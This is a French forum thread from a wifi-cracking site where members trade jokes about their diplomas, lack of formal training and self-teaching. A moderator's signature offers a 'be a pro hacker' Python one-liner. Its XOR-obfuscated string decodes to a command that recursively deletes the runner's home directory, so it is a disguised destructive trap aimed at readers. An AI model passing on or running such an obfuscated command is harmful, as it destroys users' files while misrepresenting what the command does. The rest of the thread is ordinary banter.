Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 06-05-2014 12:39:20

Ejk974
Membre

Vos diplômes ?

Bonjour, j'aurai aimé savoir quel diplômes ont les personnes qui gerent ce site ? smile en dirait que vous avez tous une source de connaissance infinie Lol je parle de (M1ck3y, Spawn, Koala etc ... ) big_smile

Bonne journée !

Config:   CM    Z77N-wfi                 
               CPU     i5 3570k
                  GPU  Gtx 660 PNY
               Alim     Bequiet 530w

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 06-05-2014 19:27:40

Furyo
Membre Irremplaçable
Site Web

Re : Vos diplômes ?

Ne gerant pas le site, je me permet juste d'apporter une reponse personnelle..

Maîtrise en Présentation du forum (j'ai failli d'ailleurs la loupé recemment à cause FFOO31) wink

Dîplomé de la detection des mythos, mais bon, je compte sur ta discrétion.. D'ailleurs, je ne ferai qu'a te referrer au membre que je cite à ma phrase precedente...

Sinon, BTS Grenadine.. avec de l'eau et des proportions adequates, ca dechirre... J'aurrai voulu aller plus mais le sucre m'a été interdit recemment...

Fonctionnaire d'état dans la gestion du temps, je fixe au quotidien l'horloge de mon bureau pour être certain de ne pas être en retard pour mon depart...

Et toi ?

Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

#3 06-05-2014 20:50:13

coyotus
Membre Irremplaçable
Lieu : fort fort lointain

Moi malheureusement suite à un problème médical de naissance, je n'ai pas su faire d'études, je suis non diplômé.
Mais ça n'empêche pas de s'auto former si on à la motivation.

1310812721.gif

#4 06-05-2014 21:38:39

Fab955
Membre Irremplaçable

Ingénieur en production de data informatique que je suis (en effet je suis souvent sur internet) je passe et trépasse le temps.

Je ressasse les forums à la recherche d'info et me promène souvent dans les jardins de google.

#5 06-05-2014 22:03:35

FFOO31
Membre d'Or

Licence en finance, master en management en cours,

#6 06-05-2014 22:08:18

Furyo
Membre Irremplaçable
Site Web

FFOO31 a écrit :

Licence en finance, master en management en cours,

et license en mythomanie, tu te sous-estime tres cher..

Remarque je dis des conneries, ca relève plutôt de l'incompetence ajouté à une grande dose de psychotherapie lié à un soucis relevant d'un manque de communication...

Oran POWAAA... trois pages pour savoir une rogue, j'avais vue ca... lol lol lol (m'enfin, tout à un debut)

Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

#7 06-05-2014 22:11:14

FFOO31
Membre d'Or

lol

#8 06-05-2014 22:14:14

M1ck3y
Administrateur
Lieu : Lost in the darkness

Après avoir fait Harvard, j'ai trouvé le milieu des bourgeois privilégiés américains ennuyeux, j'ai donc embrayé sur un CAP maçonnerie dans une ZEP en banlieue J'ai réussi à me faire élire maire de ma commune peu après grace à quelques manips sur les serveurs qui recensent les résultats des élections, j'ai donc laché le BAC Pro charcuterie sur lequel j'avais bifurqué. Je me suis fait condamner pour des faits de proxénétisme aggravé en réunion de malfaiteurs, c'était bien evidemment une erreur judiciaire monumentale. En prison, j'ai fait la connaissance de Bernard Tapie, avec qui j'ai monté par la suite une affaire de vente de copies chinoises de voitures Porsche et Audi. J'ignorais que les contrefaçons de voitures de luxe étaient illégales, je suis donc retourné en prison assez rapidement. A ma sortie, j'ai repris les études en faisant 6 années de fac de droit, ce qui m'a permis de trouver du taf dans un McDo comme assembleur de hamburgers. Aujourd'hui je suis jardinier paysagiste le jour, livreur de pizza le soir et agent de sécurité la nuit. J'ai arretté de dormir, c'est une perte de temps.

Rien de tout cela n'est vrai bien entendu, au final je n'ai absolument aucun diplome ni aucune qualification particulière dans quelque domaine que ce soit. Ou alors peut etre que si, va savoir. Si ça se trouve je n'y connais rien du tout en informatique.

#9 06-05-2014 22:25:11

Furyo
Membre Irremplaçable
Site Web

M1ck3y a écrit :

Après avoir fait Harvard, j'ai trouvé le milieu des bourgeois privilégiés américains ennuyeux, j'ai donc embrayé sur un CAP maçonnerie dans une ZEP en banlieue J'ai réussi à me faire élire maire de ma commune peu après grace à quelques manips sur les serveurs qui recensent les résultats des élections, j'ai donc laché le BAC Pro charcuterie sur lequel j'avais bifurqué. Je me suis fait condamner pour des faits de proxénétisme aggravé en réunion de malfaiteurs, c'était bien evidemment une erreur judiciaire monumentale. En prison, j'ai fait la connaissance de Bernard Tapie, avec qui j'ai monté par la suite une affaire de vente de copies chinoises de voitures Porsche et Audi. J'ignorais que les contrefaçons de voitures de luxe étaient illégales, je suis donc retourné en prison assez rapidement. A ma sortie, j'ai repris les études en faisant 6 années de fac de droit, ce qui m'a permis de trouver du taf dans un McDo comme assembleur de hamburgers. Aujourd'hui je suis jardinier paysagiste le jour, livreur de pizza le soir et agent de sécurité la nuit. J'ai arretté de dormir, c'est une perte de temps.

Rien de tout cela n'est vrai bien entendu, au final je n'ai absolument aucun diplome ni aucune qualification particulière dans quelque domaine que ce soit. Ou alors peut etre que si, va savoir. Si ça se trouve je n'y connais rien du tout en informatique.

BTS charcuterie mais oui... et la marmotte est met le chocolat dans le papier d'alu de notre ami FFOO31 ?? lol

Et puis Tappie, t'es d'oran ou quoi?

Sans compter que tu dois aussi avoir un ami super hacker qui pirate le pays entier ???

Allez M1ck3y, vas y dis le, tu n'as que le CAP 2.4Ghz... Bon, quant à tes notes, tes parents vont bientôt recevoir ton trimestre desastreux au passage... lol

387003.jpg

#10 06-05-2014 22:29:17

M1ck3y
Administrateur
Lieu : Lost in the darkness

Furyo a écrit :

Bon, quant à tes notes, tes parents vont bientôt recevoir ton trimestre desastreux au passage... lol

Ca fait bien longtemps que j'ai hacké le serveur du lycée pour trafiquer mes relevés de notes tongue

#11 06-05-2014 22:34:23

Furyo
Membre Irremplaçable
Site Web

M1ck3y a écrit :
Furyo a écrit :

Bon, quant à tes notes, tes parents vont bientôt recevoir ton trimestre desastreux au passage... lol

Ca fait bien longtemps que j'ai hacké le serveur du lycée pour trafiquer mes relevés de notes tongue

Ca y est t'es grillé, je vais te denoncer du coup...

Tout ca parce que tu as raté la seccion concernant jambon de parme...

Alors que c'est la plus facile...

387003.jpg

#12 06-05-2014 23:32:10

Fab955
Membre Irremplaçable

Meuh c'est pas grave ça il va se rattraper sur le handshake haché cablé en 220 Volt. Sinon tu compte passer le Master de viandeur après?

#13 07-05-2014 00:13:36

Pmloikju
Membre

Aller ! Plus on est de fou plus on rit, même si mon parcours n'a rien de passionnant !

Actuellement étudiant en premiére année d'école d'ingénieur d'ingénierie informatique, mais mon domaines de prédilection et depuis très longtemps (proportionnellement à mon âge) c'est le hardware et ça ne s'apprend pas à l'école !
Tout comme les vieux de la vielle de ce forum je suppose, c'est en parcourant d'autre forum que j'ai pris gout à fouiner et quoi de mieux que l'autodidacte ?

Oh et en "diplome", une certification Comptia A+ et je prépare du cisco pou bientôt...

Dernière modification par Pmloikju (07-05-2014 00:19:23)

#14 07-05-2014 06:00:57

Ejk974
Membre

M1ck3y a écrit :

Merci pour toute vos réponses smile , comme je vois pas beaucoup ont des diplomes dans le domaine hors mis la passion smile en tout cas vous avez un super forum !

Config:   CM    Z77N-wfi                 
               CPU     i5 3570k
                  GPU  Gtx 660 PNY
               Alim     Bequiet 530w

#15 07-05-2014 07:48:30

kcdtv
Membre d'honneur
Lieu : Internacionaluña

Moi j'ai le flocon d'argent. big_smile

#16 07-05-2014 08:38:46

koala
Membre d'honneur
Lieu : In the sky

kcdtv a écrit :

Moi j'ai le flocon d'argent

Arf... j'ai encore du travail a faire avec ma seconde étoile tongue

Sinon je suis dans le meme cas que Coyotus, mais comme il le précise bien tout est question de motivation.

#17 08-05-2014 14:27:26

spawn
Modérateur

Il faut faire attention, de nos jours, à la vitesse à laquelle évoluent les technologies, les formations ne suivent carrément plus.
Aussi, mettons que j'aie un diplôme, celui-ci pourrait ne pas forcément avoir grand chose à voir avec ma formation.
Tout a pu commencer en prépa (math sup, math spé) quand pour des raisons indépendantes de ma volonté (j'adore le jeu politique) j'aurais pu arriver sur crack-wifi.com.
Depuis, il est possible que je cultive de l'entropie dans ma cave.

coyotus, tu me surprend.

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#18 09-05-2014 06:46:22

bonnie & clyde
Membre

salut smile

en ce moment je réflechie à une reconversion, je pense me diriger vers les "metiers les plus simples en info" c'est à  dire technicien réparation info ou adminstrateurs réseaux...ce qui sont dans ses branches, si vos pouvez faire un retour de vos experiences, ça serait symapthiques notamment sur les formations que vous avez faites? pour la formation adultes ya pas 36 solus afpa CCI ou greta enfin je pense

#19 09-05-2014 17:06:48

coyotus
Membre Irremplaçable
Lieu : fort fort lointain

spawn a écrit :

coyotus, tu me surprend.

Pourquoi ??

1310812721.gif

#20 13-05-2014 16:00:29

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell

Ce n'est pas le permis de conduire qui tient le volant, Jacques.

#21 23-05-2014 14:19:33

slax
Membre V.I.P.

J'ai un Bac+3 en informatique.

Dernière modification par slax (23-05-2014 14:21:34)

#22 22-09-2014 13:48:00

mauha261
Membre Actif

salut je possède un petit cap serrurier métallier et j'ai une License de soudure en cour donc si sa colle pas appeler moi !

Annonce

Pied de page des forums

Le coin des bonnes affaires, achats informatiques:

|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   

Server Stats - [ Generated in 0.027 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]